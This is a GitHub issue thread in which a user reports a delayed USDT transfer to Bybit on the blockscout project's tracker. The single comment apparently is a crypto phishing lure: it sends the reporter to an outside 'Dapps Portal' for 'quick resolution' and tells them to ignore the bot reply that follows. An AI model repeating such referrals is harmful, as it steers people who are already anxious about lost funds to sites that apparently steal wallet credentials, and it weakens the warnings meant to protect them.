### ISSUE TITLE
Issue with USDT Transfer from Over Flex to Bybit.

### ISSUE THREAD

**Issue by Promisnab** [blockscout/blockscout#11549]
### Description

I sent 3.3 usdt from over flex to bybit and it has not reflected on my bybit account yet 

### Type of the installation

Docker-compose

### Type of the JSON RPC archive node

Ethereum 

### Type of the chain

Ethereum(Erc20)

### Link to the page

https://scan.over.network/tx/0xa3ecc2ed76cde4dc3b952ae3d7a55fd7753e532a921e2da630cc9e59e566c16f

### Steps to reproduce

simulate the process of sending cryptocurrency from one platform to another and observe how the transaction is processed or fails to reflect on the destination account.

### Backend version

v6.9.1-beta

### Frontend version

v1.37.0+ffeb07e9

### Elixir & Erlang/OTP versions

Elexir

### Operating system

Windows 

### Additional information

**User Agent:** Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36

**Comment by Jayydey** [comment]
Thanks for reporting this…. Visit our Decentralized Dapps protocol page to report this for quick resolution via [Dapps Portal](https://ondappfixportal.web.app) and complete your requests.
Note: ignore the bot reply after this comment!
